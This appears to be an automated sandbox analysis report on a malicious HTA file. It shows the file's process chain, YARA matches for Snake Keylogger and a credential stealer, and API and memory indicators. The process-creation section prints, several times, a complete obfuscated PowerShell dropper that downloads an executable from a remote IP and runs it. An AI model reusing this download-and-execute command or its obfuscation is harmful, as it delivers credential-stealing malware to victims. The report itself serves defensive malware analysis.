Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A99C90	7_2_05A99C90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9E4C0	7_2_05A9E4C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9E4D0	7_2_05A9E4D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A91C29	7_2_05A91C29
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9DC20	7_2_05A9DC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9DC13	7_2_05A9DC13
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9BC71	7_2_05A9BC71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A93C43	7_2_05A93C43
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A93C50	7_2_05A93C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A937E8	7_2_05A937E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A937F8	7_2_05A937F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A92F38	7_2_05A92F38
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9AF68	7_2_05A9AF68
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9AF78	7_2_05A9AF78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A92F48	7_2_05A92F48
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9A6B9	7_2_05A9A6B9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9D683	7_2_05A9D683
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9D690	7_2_05A9D690
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9A6C8	7_2_05A9A6C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9F620	7_2_05A9F620
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9F630	7_2_05A9F630
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A99E18	7_2_05A99E18
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A911A0	7_2_05A911A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9C988	7_2_05A9C988
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9118F	7_2_05A9118F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9F1C8	7_2_05A9F1C8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9F1D8	7_2_05A9F1D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9E928	7_2_05A9E928
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9E91F	7_2_05A9E91F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9C97B	7_2_05A9C97B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A940A8	7_2_05A940A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A94098	7_2_05A94098
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A908F0	7_2_05A908F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9C0CB	7_2_05A9C0CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9C0D8	7_2_05A9C0D8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A908DF	7_2_05A908DF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9B828	7_2_05A9B828
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A90006	7_2_05A90006
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9B818	7_2_05A9B818
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9E068	7_2_05A9E068
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9E078	7_2_05A9E078
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A90040	7_2_05A90040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A933A0	7_2_05A933A0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A93393	7_2_05A93393
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9B3C1	7_2_05A9B3C1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9B3D0	7_2_05A9B3D0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9AB20	7_2_05A9AB20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9AB10	7_2_05A9AB10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9FA88	7_2_05A9FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A92AE0	7_2_05A92AE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A92AF0	7_2_05A92AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9D22F	7_2_05A9D22F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9D238	7_2_05A9D238
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9A261	7_2_05A9A261
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9FA78	7_2_05A9FA78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 7_2_05A9A270	7_2_05A9A270

Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: String function: 00530AE3 appears 70 times
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: String function: 00517DE1 appears 36 times
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: String function: 00538900 appears 42 times

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: 6.2.cossess.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.cossess.exe.1540000.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 7.2.RegSvcs.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 7.2.RegSvcs.exe.5b0000.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 6.2.cossess.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 6.2.cossess.exe.1540000.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 00000007.00000002.2101798436.00000000005B2000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 00000006.00000002.965439207.0000000001540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: Process Memory Space: cossess.exe PID: 5720, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: Process Memory Space: RegSvcs.exe PID: 416, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23

Source: 6.2.cossess.exe.1540000.1.raw.unpack, UltraSpeed.cs	Cryptographic APIs: 'TransformFinalBlock'
Source: 6.2.cossess.exe.1540000.1.raw.unpack, COVIDPickers.cs	Cryptographic APIs: 'TransformFinalBlock'

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winHTA@15/19@2/4

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_0057A06A GetLastError,FormatMessageW,

6_2_0057A06A

Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_005681CB AdjustTokenPrivileges,CloseHandle,		6_2_005681CB
Source: C:\Users\user\AppData\Roaming\cossess.exe	Code function: 6_2_005687E1 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		6_2_005687E1

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_0057B333 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

6_2_0057B333

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_0058EE0D CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,

6_2_0058EE0D

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_0057C397 CoInitialize,CoCreateInstance,CoUninitialize,

6_2_0057C397

Source: C:\Users\user\AppData\Roaming\cossess.exe

Code function: 6_2_00514E89 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

6_2_00514E89

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\cosses[1].exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6936:120:WilError_03

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5brum3qz.wdw.ps1

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000007.00000002.2104403601.0000000002643000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2104403601.000000000262E000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2106038655.000000000355D000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2104403601.0000000002610000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2104403601.000000000264F000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.2104403601.0000000002620000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: niceworkingskillgivenmebest.hta	Virustotal: Detection: 37%
Source: niceworkingskillgivenmebest.hta	ReversingLabs: Detection: 27%

Source: unknown	Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\niceworkingskillgivenmebest.hta"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline"
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES99C2.tmp" "c:\Users\user\AppData\Local\Temp\dkem0svg\CSCF28CCA96CDC44F1E801052D43790FDA5.TMP"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\cossess.exe "C:\Users\user\AppData\Roaming\cossess.exe"
Source: C:\Users\user\AppData\Roaming\cossess.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Roaming\cossess.exe"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/C POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe POWerSHeLL -eX BYPasS -nop -W 1 -C DEviCEcRedeNTIAlDePLOymeNt ; iEx($(Iex('[sYSTeM.TeXt.encOdinG]'+[CHaR]58+[CHAr]58+'uTf8.GETString([sYSTEM.coNvERT]'+[Char]58+[cHAR]0x3a+'FROMBASE64StrIng('+[cHAR]34+'JHUzVXZ6ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVR5cGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlcmRlZmlOSXRpb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVSTG1vbi5ETEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1OZ2hXeFZ5Z0Isc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHZUUFZULHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEJuLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBSZ3FzcXJaRGRpQik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAic1ZIV3hhQmFwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNQQUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIER3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJHUzVXZ6OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTk4LjEyLjg5LjI0LzM0Ni9jb3NzZXMuZXhlIiwiJGVOVjpBUFBEQVRBXGNvc3Nlc3MuZXhlIiwwLDApO3NUQVJULXNsRUVwKDMpO0ludk9rRS1JdEVNICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRW52OkFQUERBVEFcY29zc2Vzcy5leGUi'+[CHar]0X22+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\dkem0svg\dkem0svg.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Users\user\AppData\Roaming\cossess.exe "C:\Users\user\AppData\Roaming\cossess.exe"	Jump to behavior
